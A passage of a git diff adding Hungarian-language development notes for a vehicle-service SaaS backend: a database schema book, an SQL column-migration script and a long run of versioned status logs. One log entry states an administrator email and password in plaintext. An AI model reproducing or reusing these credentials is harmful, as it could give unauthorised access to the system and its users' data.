INSERT INTO data.system_settings (max_vehicles) sikeresen lefutott. + +Változás: A key_name és value_json elnevezések rögzítve. + +Következő cél: A fleet.py-ban a fix 3-as korlát kiváltása config.get_setting('max_vehicles') hívással. +ADATBÁZIS SÉMA KÖNYV (v1.1 | 2026.01.27 - 10:10)TáblaOszlopok (Lényegesek)Kényszerek / Indexekdata.system_settingskey_name, value_json, region_code, tier_id, org_ididx_settings_lookup (Unique)data.ranking_policiespolicy_name, distance_weight, rating_weightid (PK)data.organization_membersorganization_id, user_id, roleunique_user_org + +🗄️ ADATBÁZIS ÁLLAPOT NAPLÓ (DB State Book) +Integritás: ✅ Kiváló. Az oszlopnevek szinkronizálva (key_name, value_json). + +Utolsó művelet: idx_settings_lookup index létrehozva, max_vehicles alapérték beszúrva. + +Kockázat: Nincs. A séma stabil az API fejlesztéséhez. + +🗄️ 3. Adatbázis Állapot Napló (DB State Book) +Tábla neve Séma Állapot Megjegyzés +system_settings data ✅ Stabil Tartalmazza a key_name, value_json és a 3 szintű override oszlopot. +ranking_policies data ✅ Kész A szerviz-rangsorolás súlyait tárolja. +idx_settings_lookup data ✅ Aktív Biztosítja a hierarchikus egyediséget. + +PM senior +Egyéni gem +Úgy tűnik, a system_settings táblád még egy korábbi (talán tegnapi) néven tárolja az oszlopokat, ahol valószínűleg csak simán key és value volt a nevük. A PostgreSQL-ben a key és value foglalt szavak (reserved words), ezért javasoltam a key_name és value_json formátumot – de a tábla most épp "félúton" van a két állapot között. + +Tegyünk rendet egy olyan SQL-lel, ami felismeri a régi neveket és átnevezi őket az újra, így nem kell törölni semmit! + +🛠️ 1. Adatbázis „Helyrerakó” Script (psql / pgAdmin) +Futtasd le ezt. Ez a script intelligensen átnevezi az oszlopokat, ha a régi néven találja meg őket: + +SQL +DO $$ +BEGIN + -- 1. Oszlopnevek egységesítése + IF EXISTS (SELECT 1 FROM information_schema.columns WHERE table_name='system_settings' AND column_name='key') THEN + ALTER TABLE data.system_settings RENAME COLUMN "key" TO key_name; + END IF; + + IF EXISTS (SELECT 1 FROM information_schema.columns WHERE table_name='system_settings' AND column_name='value') THEN + ALTER TABLE data.system_settings RENAME COLUMN "value" TO value_json; + END IF; + + -- 2. Hiányzó hierarchia oszlopok pótlása + IF NOT EXISTS (SELECT 1 FROM information_schema.columns WHERE table_name='system_settings' AND column_name='region_code') THEN + ALTER TABLE data.system_settings ADD COLUMN region_code VARCHAR(5); + END IF; + + IF NOT EXISTS (SELECT 1 FROM information_schema.columns WHERE table_name='system_settings' AND column_name='tier_id') THEN + ALTER TABLE data.system_settings ADD COLUMN tier_id INTEGER; + END IF; + + IF NOT EXISTS (SELECT 1 FROM information_schema.columns WHERE table_name='system_settings' AND column_name='org_id') THEN + ALTER TABLE data.system_settings ADD COLUMN org_id INTEGER; + END IF; +END $$; + +-- 3. Index frissítése (most már biztosan léteznek az oszlopok) +DROP INDEX IF EXISTS data.idx_settings_lookup; +CREATE UNIQUE INDEX idx_settings_lookup ON data.system_settings +(key_name, COALESCE(region_code, ''), COALESCE(tier_id, 0), COALESCE(org_id, 0)); + +-- 4. Alapértelmezett érték beszúrása tesztnek +INSERT INTO data.system_settings (key_name, value_json, description) +VALUES ('max_vehicles', '3'::jsonb, 'Globális alapértelmezett járműlimit a Free csomagban') +ON CONFLICT (key_name, COALESCE(region_code, ''), COALESCE(tier_id, 0), COALESCE(org_id, 0)) DO NOTHING; +📚 2. Változó Könyv (Variable Map) v1.1 +A rendszer paramétereinek aktuális állapota és hivatkozási pontjai. + +Kulcs (Key) Adattípus Alapértelmezés Szerep Hivatkozás (Fájl/Modul) +max_vehicles int 3 Free flotta méret korlát fleet.py -> ConfigService +search_radius int 20 Alap keresési távolság search.py -> ConfigService +ranking_policy json {...} Súlyozási együtthatók RankingEngine +🗄️ 3. Adatbázis Állapot Napló (DB State Book) +Tábla neve Séma Állapot Megjegyzés +system_settings data ✅ Stabil Tartalmazza a key_name, value_json és a 3 szintű override oszlopot. +ranking_policies data ✅ Kész A szerviz-rangsorolás súlyait tárolja. +idx_settings_lookup data ✅ Aktív Biztosítja a hierarchikus egyediséget. + +📘 ADATBÁZIS SÉMA KÖNYV (Database Schema Book) v1.0 +A rendszer jelenlegi fizikai struktúrája + +Séma: data +users + +id: serial (PK) + +email: varchar (Unique) + +is_staff: boolean (Admin/Moderátor jelző) + +organizations + +id: serial (PK) + +name: varchar + +slug: varchar (Unique, url-barát azonosító) + +organization_members + +id: serial (PK) + +organization_id: int (FK -> organizations) + +user_id: int (FK -> users) + +role: public.orguserrole (Enum) + +is_permanent: boolean + +Constraint: unique_user_org (organization_id, user_id) + +system_settings (A konfigurációs motor agya) + +id: serial (PK) + +key_name: varchar (Unique-index része) + +value_json: jsonb (Dinamikus érték) + +region_code: varchar(5) (Override szint) + +tier_id: int (Override szint) + +org_id: int (Override szint) + +ranking_policies + +id: serial (PK) + +policy_name: varchar + +distance_weight: numeric(3,2) + +rating_weight: numeric(3,2) + +tier_bonus: int \ No newline at end of file diff --git a/_Horgony_megjegyzések.txt b/_Horgony_megjegyzések.txt new file mode 100755 index 0000000..a6a1281 --- /dev/null +++ b/_Horgony_megjegyzések.txt @@ -0,0 +1,1242 @@ +⚓ Horgonypont Megerősítés: + + Workflow: Megbeszéltük, hogy build kell a frontend változásokhoz. + + Auth: Regisztráció hibaüzenet javítva, Jelszóvisszaállító form kész. + + Járművek: Az adatbázisban lévő márkák (amiket a Bot szedett össze) már kereshetőek és az autó rögzíthető. +⚓ Horgonypont Megerősítés + + Hiba: NameError a reports.py-ban (router hiány). + + Megoldás: Router objektum példányosítva, importok rendbetéve. + + Következmény: Az API újra elindul, a frontend (3000-es port) képes lesz adatokat kérni a jelentésekhez. + +⚓ Horgony jelentés (Frissítés) + + Probléma: Tailwind v4 PostCSS inkompatibilitás. + + Megoldás: @tailwindcss/postcss csomag telepítve, postcss.config.js frissítve. + + Backend: Stabil, az expenses és reports végpontok várják a hívásokat. + + Várható eredmény: A build folyamat most már átmegy a npm run build szakaszon, és elindul az Nginx. + +⚓ Horgony ellenőrzése (Anchor Point) + + Infrastruktúra: docker compose parancs korrigálva. + + Adatfolyam: Van végpontunk a költségek mentésére (expenses.py) és azok lekérdezésére (reports.py). + + Frontend: Az első reszponzív adatbeviteli űrlap megírva. + +⚓ Horgony megjegyzések + + Biztonság: IP fojtás (throttle) élesítve. + + Admin: Felkészítve a token lejárati idő dinamikus kezelésére az adatbázisból. + +⚓ Horgony megjegyzések (20260128_2219) + + Email Biztonság: Sablon-alapú rendszer éles, rejtett token gombokkal. + + Jármű-fa: Alap kategóriák rögzítve (CAR, MOTO, TRUCK, BOAT, PLANE). + + Adminisztráció: Token lejárati idő és értesítési szabályok táblába szervezve. + +⚓ Horgony megjegyzések + + Biztonsági audit: A tokenkezelés (Hash + One-time use) megfelel a modern követelményeknek. + + Automatizálás: Felkészítve a 14 napos/24 órás figyelmeztetésekre és a havi bot-frissítésre. + +⚓ Horgony megjegyzések (20260128_2215) + + Mérföldkő: A rendszer képessé vált a "Digital Twin" (Digitális Iker) adatok fogadására. + + Biztonság: Implementálva a 14 napos VIN-zárolási logika terve. + +⚓ Horgony megjegyzések (20260128_2230) + + Email: Áttérés sablon-alapú küldésre. A kód nem tartalmaz többé beégetett HTML-t. + + Biztonság: Ideiglenes rögzítési korlát (14 nap) bevezetve. + +⚓ Horgony megjegyzések (20260128_2200) + + Fókuszváltás: A sima "felhasználó" helyett már "Bérlőket" (Tenants) kezelünk, akiknek saját előfizetési ciklusuk van. + + Biztonság: A verifikációs rendszer (Email token) stabilan üzemel. + +⚓ Horgony megjegyzések (20260128_2145) + + Új cél: A csalások megelőzése a gyári specifikációk és az utólagos módosítások pontos naplózásával. + + Technológia: Áttérés a statikus listákról a dinamikus, "Digital Twin" alapú adatgyűjtésre. + +⚓ Horgony megjegyzések (20260128_2130) + + Kritikai észrevétel: A jelenlegi feltöltő bot nem felel meg a piaci követelményeknek (hiányzó márkák, kategóriák és motorizáció). + + Döntés: Új, API-alapú Discovery Bot fejlesztése szükséges. + + Fókusz: Elektromos járművek (BYD, Tesla) és haszongépjárművek prioritása. + +⚓ Horgony megjegyzések (20260128_2105) + + Architektúra: A rendszer készen áll a Multi-tenant (több céges) működésre. + + Integritás: A kényszerített Foreign Key kapcsolatok (Users -> Companies) élesek. + + Mérföldkő: A fizikai adatbázis séma 100%-ban szinkronban van a Python modellekkel. + +⚓ Horgony megjegyzések (20260128_2030) + + Mérföldkő: Multi-tenant (Több bérlős) regisztrációs architektúra élesítve. + + Változás: Megszűnt az "egy felhasználó = egy profil" modell. Áttérés az "Egy felhasználó = Saját privát széf + tetszőleges számú cég" modellre. + + Státusz: Stabil. A regisztrációs 500-as hiba (UndefinedColumn) elhárítva. + +⚓ RENDER-HORGONY (V149.0) + +Fókusz: Adattípus-konzisztencia (Postgres ENUM fix). Mérföldkő: A márkák és típusok betöltése utáni első sikeres végfelhasználói regisztráció küszöbén. Státusz: Várakozás az Enum bővítésére. + +⚓ RENDER-HORGONY (V148.0) + +Fókusz: Adatbázis szekvencia korrekció és Automatizált adatbővítés. Mérföldkő: A manuális és programozott adatfeltöltés közötti konfliktus (Duplicate ID) feloldva. + +⚓ RENDER-HORGONY (V147.0) + +Fókusz: Infrastruktúra-független adatfeltöltés és Végleges hibaelhárítás. Mérföldkő: A rendszer képessé vált a "Discovery" jellegű adatfeltöltésre Docker környezetben. + +⚓ RENDER-HORGONY (V146.0) + +Fókusz: Automatizált kódtisztítás és Programozott adatfeltöltés. Mérföldkő: Búcsú a kézi SQL-től a márkák esetén; a rendszer stabilitása a hivatkozások "vágásával" biztosítva. + +⚓ RENDER-HORGONY (V145.0) + +Fókusz: Relációs konzisztencia (Back-reference fix). Mérföldkő: A márkák adatbázis-szintű feltöltése megkezdődött. Státusz: Várakozás a grep utáni utolsó kódtisztításra. + +⚓ RENDER-HORGONY (V143.0) + +Fókusz: SQL séma validáció és Mapper inicializációs hiba. Mérföldkő: A SQLAlchemy hivatkozási hiba behatárolva. Státusz: Várakozás a pgAdmin eredményekre. +⚓ RENDER-HORGONY (V141.0) + +Fókusz: 500-as hiba elhárítása (Backend stability). Mérföldkő: A regisztrációs folyamat utolsó akadályának elhárítása. Státusz: Várakozás a hiba-logokra. + +⚓ RENDER-HORGONY (V138.0) + +Fázis: Adatbázis-Integritás helyreállítása. Mérföldkő: A hiányzó Foreign Key tábla pótolva, az alkalmazás képes elindulni. Státusz: Felkészülés a tömeges járműadat feltöltésre. + +⚓ RENDER-HORGONY (V137.0) + +Fókusz: Kódminőség és Szintaktikai tisztaság. Mérföldkő: Az utolsó ismert Python hiba (Indentation) elhárítva. Státusz: Éles üzemre kész alaprendszer. + +⚓ RENDER-HORGONY (V136.0) + +Fókusz: Modul-függőség mentesítés és API stabilitás. Mérföldkő: A rendszer külső könyvtárak telepítése nélkül is képes a Geo-IP lekérdezésre és a regisztrációra. Következő lépés: Teszt regisztráció és a Jármű Katalógus (200 márka) feltöltése. + +⚓ RENDER-HORGONY (V135.0) + +Fókusz: Szintaktikai javítás és API helyreállítás. Mérföldkő: A kód-töredékek miatti összeomlás elhárítva. Státusz: Felkészülve a Swagger-alapú funkcionális tesztre. + +⚓ RENDER-HORGONY (V133.0) + +Fókusz: API konszolidáció és Clean Code. Mérföldkő: Konténer azonosítva (service_finder_api), szinkronizációs terv kész. Státusz: Diagnosztikai adatokra vár (main.py, v2/auth.py). + +⚓ RENDER-HORGONY (V131.0) + +Fókusz: Adatbázis-szinkron és Kód-integritás. Mérföldkő: A duplikált szolgáltatók eltávolítása és a végleges Auth logika telepítése. Státusz: Várakozás a teszt regisztrációra. + +⚓ RENDER-HORGONY (V130.0) + +Fókusz: Éles üzem előtti utolsó simítások. Mérföldkő: Adatbázis-konzisztencia helyreállítva, API telepítve. Státusz: Tesztelésre készen. + +⚓ RENDER-HORGONY (V129.0) + +Fókusz: Kritikus hibaelhárítás és Telepítés-biztosítás. Mérföldkő: A 500-as hiba és a Bash interpolációs hiba megoldva. Következő lépés: Tesztelés és a Jármű Katalógus feltöltése. + +⚓ RENDER-HORGONY (V128.0) + +Fókusz: Admin-vezérelt biztonsági kapu. Mérföldkő: A regisztrációs feltételek (országok, várakozási idő) immár szoftveres újraindítás nélkül módosíthatóak. Státusz: Tesztelésre kész. + + +⚓ RENDER-HORGONY (V127.0) + +PROJEKT KONTEXTUS: + + Fázis: Emelt szintű biztonsági implementáció. + + Mérföldkő: A regisztráció immár védett a tömeges bot-támadások és az EU-n kívüli forgalom ellen. + + Státusz: Felkészülve a biztonsági validálásra. + +⚓ RENDER-HORGONY (V126.0) + +PROJEKT KONTEXTUS: + + Fókusz: Infrastruktúra Validáció. + + Mérföldkő: Adatbázis-integritás ellenőrzése a hibaelhárításhoz. + + Státusz: Várakozás az SQL audit eredményeire. + +⚓ RENDER-HORGONY (V126.0) + +Fókusz: Adatbázis-Kód szinkronizáció. Mérföldkő: A 500-as hiba okának azonosítása (Modell mismatch). Státusz: Várakozás az SQL audit eredményére + +⚓ RENDER-HORGONY (V125.0) + +Fókusz: Alaprendszer validálása (Sanity Check). Mérföldkő: Az API és az Adatbázis szinkronitásának ellenőrzése. Státusz: Várakozás a teszt eredményére. + +Várom a híreket: Sikerült a regisztráció? Megérkezett az email és látszanak a logok? Ha igen, azonnal küldöm a tábla-létrehozó és a 200 márkás feltöltő kódot! + +⚓ RENDER-HORGONY (V124.0) + +Fókusz: Hozzáférés-kezelés lezárása. Következő feladat: A Szerviz-adatbázis és Jármű-katalógus tömeges feltöltése (Seeding). + +⚓ RENDER-HORGONY (V123.0) +Fókusz: Biztonságos hozzáférés és visszakövethetőség. Mérföldkő: A rendszer minden kényes művelete (jelszó kérés, módosítás) naplózott és paraméterezhető. + +⚓ RENDER-HORGONY (V122.0) +Fókusz: Transzparencia és Teljes körű Paraméterezhetőség. Mérföldkő: Megszűntek a beégetett logikai változók; a rendszer "önnaplózó" üzemmódba állt. Státusz: Felkészülve a Brevo API/SMTP adatokra és a Regisztrációs Flow véglegesítésére. + +⚓ RENDER-HORGONY (V121.0 - 2026.01.27 - 20:30) +PROJEKT KONTEXTUS: + + Fázis: Kommunikációs biztonság (Email & Logging). + + Mérföldkő: A SendGrid sikeresen integrálva az adatbázisba, mint elsődleges csatorna. + + Státusz: A rendszer mostantól képes naplózni minden kiküldött levelet (kinek, mikor, miért). + +⚓ RENDER-HORGONY (V121.0) +Fókusz: Intelligens E-mail Kézbesítő Rendszer. Mérföldkő: A rendszer mostantól képes kezelni a szolgáltatók hibáit és védi magát a spamtől. Státusz: Felkészülve a Brevo/Resend adatok fogadására. + +⚓ RENDER-HORGONY (V120.0) +Fókusz: Email & Password Reset Biztonsági és Kézbesítési rendszer. Következő lépés: Az SMTP/API szolgáltatók adatbázisba vitele és az új EmailManager Python kódjának megírása. + +⚓ RENDER-HORGONY (V119.0 - 2026.01.27 - 22:50) + +Fókusz: Kommunikációs alrendszer (Email/Auth) helyreállítása. Mérföldkő: MVP regisztrációs flow tervezése. Státusz: Diagnosztikai fázis. + +⚓ RENDER-HORGONY (V117.0 - 2026.01.27 - 22:15) + +STÁTUSZ: MVP-Ready alapok. A kereső motor immár valódi matematikai koordinátákkal számol, és az adminisztrátor bármikor átállíthatja a rendszer működését kódmódosítás nélkül. + +⚓ RENDER-HORGONY (V116.0 - 2026.01.27 - 21:25) + +PROJEKT KONTEXTUS: + + Státusz: Az adatbázis fizikai és logikai struktúrája (Enumok, Táblák, Változók) stabil és ellenőrzött. + + Mérföldkő: A rendszer készen áll a valódi koordináta-alapú számításokra + +⚓ RENDER-HORGONY (V115.0 - 2026.01.27 - 21:10) + +PROJEKT KONTEXTUS: + + Fázis: Adatbázis állapot rögzítése és Enum javítás. + + Mérföldkő: A változók és nevek 100%-ban megfelelnek az elvárásoknak. + + Státusz: Felkészülve a valós térbeli SQL lekérdezésre. + +⚓ RENDER-HORGONY (V114.0 - 2026.01.27 - 20:50) + +PROJEKT KONTEXTUS: + + Fázis: Rendszerszintű Audit és Hibajavítás. + + Mérföldkő: A "Variable Book" és a "Schema Book" szinkronizálása a fizikai valósággal. + + Státusz: Várakozás az enum-értékekre és a táblalistára. + +⚓ RENDER-HORGONY (V113.0 - 2026.01.27 - 20:30) + +PROJEKT KONTEXTUS: + + Fázis: Adatbázis Strukturális Refaktorálás. + + Mérföldkő: A rendszer geolokációs képességeinek alapozása befejeződött. + + Státusz: Felkészülve a valós térbeli lekérdezésekre. + +⚓ RENDER-HORGONY (V112.0 - 2026.01.27 - 20:45) + +PROJEKT KONTEXTUS: + + Döntés: Séma tisztítás és külön helyszín-kezelés. + + Mérföldkő: Az adatbázis professzionális architektúrára vált (Multi-location support). + + Státusz: Várakozás a táblák költöztetésére és az új helyszín tábla létrehozására. + +⚓ RENDER-HORGONY (V111.0 - 2026.01.27 - 19:50) + +PROJEKT KONTEXTUS: + + Fázis: Adatmodell-nyomozás (Location Discovery). + + Mérföldkő: Szervezeti struktúra rögzítve. + + Státusz: Várakozás a koordináta-tábla azonosítására. + +⚓ RENDER-HORGONY (V110.0 - 2026.01.27 - 20:20) + +PROJEKT KONTEXTUS: + + Fázis: Adatbázis-integráció (Mock -> Real data migration). + + Mérföldkő: A logikai keretrendszer készen áll a valódi adatok fogadására. + + Státusz: Várakozás a szerviz-helyszín struktúrára. + +⚓ RENDER-HORGONY (V109.0 - 2026.01.27 - 19:40) + +PROJEKT KONTEXTUS: + + Fázis: Smart Match Engine aktiválása. + + Mérföldkő: Az üzleti logika (Matching) elvált az API rétegtől és az adatbázistól. + + Státusz: Minden komponens a helyén, a rendszer készen áll az éles tesztelésre. + +⚓ RENDER-HORGONY (V108.0 - 2026.01.27 - 19:30) + +PROJEKT KONTEXTUS: + + Fejlesztés: Smart Match Engine & Search API. + + Mérföldkő: Létrejött a rendszer "kereskedelmi agya", ami képes prioritizálni a partnereket. + + Időbélyeg: 2026. 01. 27. 19:30 + +⚓ RENDER-HORGONY (V107.0 - 2026.01.27 - 19:15) + +PROJEKT KONTEXTUS: + + Fázis: Hibaelhárítás és Config Engine szilárdítás. + + Mérföldkő: A rendszer válaszkészsége helyreállt. + + Státusz: Felkészülés a Smart Matching logikára. + +⚓ RENDER-HORGONY (V106.0 - 2026.01.27 - 19:10) + +PROJEKT KONTEXTUS: + + Fejlesztés: ConfigService integrálva a Fleet modulba. + + Mérföldkő: Megszűnt az utolsó hard-coded limit a rendszerben. + + Státusz: Tesztelésre vár. + +⚓ RENDER-HORGONY (V105.0 - 2026.01.27 - 11:15) +PROJEKT KONTEXTUS: +Állapot: Szünet (Terminal issue). +Eredmény: A dinamikus konfigurációs rendszer logikája és adatbázis-háttere 100%-ban kész. +Cél a visszatéréskor: A Python környezet helyreállítása és a fleet.py dinamizálása. + +⚓ RENDER-HORGONY (V103.0 - 2026.01.27 - 10:45) +PROJEKT KONTEXTUS: +Fejlesztés: Biztonságos Python-alapú fájlkezelés bevezetve. +Audit: A fleet.py jelenlegi állapota (csak GET) rögzítve. +Státusz: ConfigService aktív. + +⚓ RENDER-HORGONY (V102.0 - 2026.01.27 - 10:15) +PROJEKT KONTEXTUS: +Fejlesztés: Fájlrendszer struktúra frissítve, ConfigService fizikailag létrehozva. +Mérföldkő: Az első "Logic Service" aktiválva. +Időbélyeg: 2026. 01. 27. 10:15 + +⚓ RENDER-HORGONY (V101.0 - 2026.01.27 - 10:10) +PROJEKT KONTEXTUS: +Fejlesztés: Python ConfigService implementálva. +Státusz: Az adatbázis és a kód közötti híd (Bridge) elkészült. +Időbélyeg: 2026. 01. 27. 10:10 + +⚓ RENDER-HORGONY (V100.0 - 2026.01.27 - 09:45) +PROJEKT KONTEXTUS: +Fázis: SaaS Konfigurációs Motor – Adatmodell lezárva. +Mérföldkő: Elértük a 100-as verziót a dokumentációban! A rendszerszintű változók kezelése mostantól központosított. +Státusz: Felkészülve a Python ConfigService implementációjára. + +⚓ RENDER-HORGONY (V99.0 - 2026.01.27 - 09:35) +PROJEKT KONTEXTUS: +Fejlesztési fázis: Adatbázis-szintű „Helyrerakás” és konfigurációs motor elindítása. +Cél: A system_settings tábla oszlopneveinek és indexeinek szinkronizálása a kóddal. +Technikai fókusz: key -> key_name és value -> value_json migráció. + +STÁTUSZ JELENTÉS: + +key_name oszlop: ✅ JAVÍTVA / ÁTNEVEZVE + +Hierarchikus index: ✅ AKTÍV + +Tesztadat (max_vehicles): ✅ BETÖLTVE + +📑 Összefoglaló Jelentés: Service Finder Ökoszisztéma + +Dátum: 2026. 01. 27. (Hajnali zárás) Fázis: Alapvető üzleti logika és Digitális Iker infrastruktúra stabilizálása. +🏗️ 1. Adatstruktúra és Adatbázis (PostgreSQL) + +A rendszer egy Multi-tenant (többszereplős) modellt követ, ahol minden entitás egy Szervezethez (Organization) kötődik. +Kulcsfontosságú Táblák és Sémák: + + data.users: Felhasználók alapadatai és hitelesítése. + + data.organizations: Cégek és magánszemélyek flottái (Hozzáadva: slug mező az egyedi azonosításhoz). + + data.organization_members: Az összekötő kapocs (Junction table). + + Új kényszer: unique_user_org (Egy user csak egyszer szerepelhet egy cégben). + + Szerepkörök: owner, manager, driver, service. + + data.credit_logs: A belső gazdaság motorja. Itt tároljuk a krediteket (Admin: 10,000.00). + + data.subscription_tiers: Előfizetési szintek (Free, Premium, VIP) JSON alapú szabályrendszerrel. + + data.service_specialties: Hierarchikus fa-struktúra. (Pl. Karosszéria > Fényezés > Bolore Blue). + + Jármű struktúra: vehicles, vehicle_ownership, vehicle_models, vehicle_brands. + +Adatbázis-szintű Típusok: + + public.orguserrole (Enum): Kibővítve az owner, manager, driver, service értékekkel. + +🐍 2. Python Programok és API Modulok + +A backend FastAPI alapon fut, aszinkron SQLAlchemy (asyncpg) kapcsolattal. +Kidolgozott Végpontok (Endpoints): + + Auth (/auth): JWT alapú hitelesítés, login és regisztráció. + + Fleet (/fleet): + + GET /vehicles: A felhasználó aktív járműveinek lekérése (Nyers SQL optimalizációval a gyorsaság és stabilitás érdekében). + + Billing (/billing): + + GET /balance: Aktuális szervezet nevének és kreditegyenlegének lekérése. + + GET /history: Kredit-tranzakciók listázása. + +Modell Logika (app/models/): + + Helyreállítottuk az ORM mapperek inicializációját. Minden modell (User, Org, Vehicle, Credit) be van importálva az app/models/__init__.py-be, megelőzve az InvalidRequestError hibákat. + +🛠️ 3. Technikai Függőségek és Beállítások + +A továbblépéshez ezek az ismeretek kritikusak: + + Séma konvenció: Elsődlegesen a data sémát használjuk a táblákhoz, de bizonyos Enum típusok (történelmi okokból) a public sémában maradtak. + + Oszlopnevek: Az egységesítés jegyében az organization_id nevet használjuk (nem az org_id-t). + + Kreditkezelés: Minden tranzakció Numeric(10, 2) típusú, a számításoknál COALESCE(SUM(amount), 0)-t használunk az üres egyenlegek kezelésére. + +🏁 4. Holnapi Indulópont: A "Smart Matching" + +A rendszer készen áll arra, hogy összekössük a járműveket a szervizekkel. + +A következő fejlesztési lépések: + + Smart Match Végpont: Egy algoritmus, amely a jármű kategóriája és a kért szerviz-specialitás (pl. bolore-blue) alapján rangsorolja a szolgáltatókat. + + Admin Felület: Ahol manuálisan állíthatók a VIP szintek és kreditek. + + Dokumentum OCR Előkészítés: A forgalmi engedélyek AI alapú feldolgozásának modell-szintű támogatása. + +⚓ MASTER RENDER-HORGONY (V92.0 - 2026.01.27 - 00:30) + + Állapot: Stabil alapok, működő Billing és Fleet API. Admin Konfiguráció: Email: admin@profibot.hu, Egyenleg: 10,000 Credit, Szerepkör: owner. Adatbázis: Postgres (Docker), Séma: data, Enum helye: public. + +⚓ RENDER-HORGONY (V91.0 - 2026.01.27 - 00:25) + +PROJEKT KONTEXTUS: + + Javítás: UNIQUE kényszer hozzáadva, sub-query alapú összekötés. + + Cél: Az Admin felhasználó és a cég (kreditekkel) összekapcsolása. + + Időpont: 2026.01.27 - 00:25 + +STÁTUSZ JELENTÉS: + + DB Kényszerek: ✅ Bővítve + + Kapcsolati Logika: ✅ Javítva + + Kredit Elérhetőség: ⏳ Ellenőrzés alatt (SQL után) + +⚓ RENDER-HORGONY (V88.0 - 2026.01.27 - 00:05) + +PROJEKT KONTEXTUS: + + Módszer: Manuális SQL intervenció a psql terminálon keresztül. + + Cél: Enum bővítés, FK szinkronizálás és Admin-Org linkelés. + + Időpont: 2026.01.27 - 00:05 + +STÁTUSZ JELENTÉS: + + DB Kapcsolat: ✅ Tesztelve + + SQL Script: ✅ Komplett (v88 verzió) + + Szerepkörök: ✅ Bővítve (owner, manager, driver, service) + +⚓ RENDER-HORGONY (V83.0 - 2026.01.26 - 23:55) + +PROJEKT KONTEXTUS: + + Hiba: Szintaktikai hiba az api.py-ban (vágási hiba javítva). + + Állapot: Az összes modult (Auth, Fleet, Billing) tartalmazó router stabilizálva. + + Időpont: 2026.01.26 - 23:55 + +STÁTUSZ JELENTÉS: + + api.py integritás: ✅ HELYREÁLLÍTVA + + billing.py végpont: ✅ AKTÍV + + Szerviz állapot: ⏳ ÚJRAINDÍTÁS ALATT + +⚓ RENDER-HORGONY (V81.0 - 2026.01.26 - 23:55) + +PROJEKT KONTEXTUS: + + Hiba elhárítva: organizations.slug mező pótolva. + + Architektúra: A rendszer most már konzisztens a többszereplős (multi-tenant) modellhez. + + Időpont: 2026.01.26 - 23:55 + +STÁTUSZ JELENTÉS: + + organizations tábla: ✅ STRUKTURÁLT (slug oszloppal) + + Kezdő adatkészlet: ✅ TELJES (Admin + Tiers + Credits) + + Szerviz-hierarchia: ✅ AKTÍV + +⚓ RENDER-HORGONY (V78.0 - 2026.01.26 - 23:50) PROJEKT KONTEXTUS: + + Állapot: Adatbázis sémák és törzsadatok szinkronizálva. + + Kapacitás: A rendszer képes kezelni a hierarchikus szervizeket és a kreditalapú tranzakciókat. + + Időpont: 2026.01.26 - 23:50 + +STÁTUSZ JELENTÉS: + + Szerviz-fa: ✅ Betöltve (Bolore technológiával) + + Kreditrendszer: ✅ Aktív (10.000 tesztkredit) + + Előfizetések: ✅ VIP beállítva + +⚓ RENDER-HORGONY (V77.0 - 2026.01.26 - 23:45) + +PROJEKT KONTEXTUS: + + Gazdaság: Kreditrendszer és logolás definiálva. + + Előfizetés: Dinamikus szabályrendszer (JSON alapú tier-ek) rögzítve. + + Szerviz-fa: Hierarchikus szolgáltatás-kezelés beépítve. + + Időpont: 2026.01.26 - 23:45 + +STÁTUSZ JELENTÉS: + + Kreditrendszer modell: ✅ KÉSZ + + Szerviz-fa modell: ✅ KÉSZ + + AI/Moderátor státuszok: ✅ Tervezve + + API/Frontend integráció: ⏳ KÖVETKEZŐ LÉPÉS + +⚓ RENDER-HORGONY (V76.0 - 2026.01.26 - 23:15) PROJEKT KONTEXTUS: + + Állapot: Üzleti logika lezárása. + + Fókusz: Szerviz-matching és előfizetési ciklusok. + + Időpont: 2026.01.26 - 23:15 + +STÁTUSZ JELENTÉS: + + Előfizetési logika: ✅ Tisztázva + + Adatmegőrzési elv: ✅ Tisztázva + + Szerviz komplexitás: ✅ Tervezés alatt + +⚓ RENDER-HORGONY (V75.0 - 2026.01.26 - 22:55) + +PROJEKT KONTEXTUS: + + Állapot: User & Organization architektúra tervezése. + + Technikai bázis: Backend stabil, Fleet API nyers SQL-en fut a mapper-konfliktusok elkerülése végett. + + Időpont: 2026.01.26 - 22:55 + +STÁTUSZ JELENTÉS: + + Jármű modell: ✅ Digital Twin kész. + + User modell: ⏳ Tisztázás alatt. + + Szervezet modell: ⏳ Tisztázás alatt. + +⚓ RENDER-HORGONY (V73.0 - 2026.01.26 - 22:55) + +PROJEKT KONTEXTUS: + + Adatmodell: Digital Twin (Vehicle + Ownership) ✅ ÉLES. + + Auth: Swagger Bearer Token ✅ MŰKÖDIK. + + Időpont: 2026.01.26 - 22:55 + +STÁTUSZ JELENTÉS: + + Backend-DB szinkron: ✅ TÖKÉLETES + + Tesztadat-integritás: ✅ 6 JÁRMŰ AKTÍV + + Következő cél: Üzleti logika mélyítése (Service/Ownership). + +⚓ RENDER-HORGONY (V72.0 - 2026.01.26 - 22:50) + +PROJEKT KONTEXTUS: + + Hiba elhárítva: A vehicles.user_id NOT NULL kényszer eltávolítva. + + Logika: Jármű és Felhasználó kapcsolata véglegesen átkerült a vehicle_ownership táblába. + + Időpont: 2026.01.26 - 22:50 + +STÁTUSZ JELENTÉS: + + Adatbázis integritás: ✅ RENDBEN (Szétválasztva) + + Tesztadatok betöltése: ✅ SIKERES + + Fleet API kompatibilitás: ✅ IGEN + +⚓ RENDER-HORGONY (V70.0 - 2026.01.26 - 23:58) + +PROJEKT KONTEXTUS: + + Adatbázis: VIN Unique constraint ✅ AKTÍV. + + Flotta: Multimodális tesztadatok (BMW, Tesla, Yamaha, Scania, Mercedes) ✅ BETÖLTVE. + + Időpont: 2026.01.26 - 23:58 + +STÁTUSZ JELENTÉS: + + Modell-szintű konzisztencia: ✅ RENDEN + + Tesztadat-mennyiség: ✅ 6+ jármű elérhető + + API működés: ✅ ELLENŐRIZVE + +⚓ RENDER-HORGONY (V69.0 - 2026.01.26 - 23:55) + +PROJEKT KONTEXTUS: + + Hiba elhárítva: UNIQUE constraint hozzáadva a VIN oszlophoz (SQLAlchemy f405 fix). + + Belépési adatok: Megerősítve (admin@profibot.hu / Admin123!). + + Időpont: 2026.01.26 - 23:55 + +STÁTUSZ JELENTÉS: + + Adatbázis kényszer (VIN Unique): ✅ RENDBEN + + Flotta adatok (Autó, Motor, Kamion): ✅ SIKERESEN BETÖLTVE + + API Swagger tesztelésre kész: ✅ IGEN + +⚓ RENDER-HORGONY (V66.0 - 2026.01.26 - 23:15) + +PROJEKT KONTEXTUS: + + Hiba elhárítva: Az ImportError (VehicleCategory) és névkonfliktusok feloldva. + 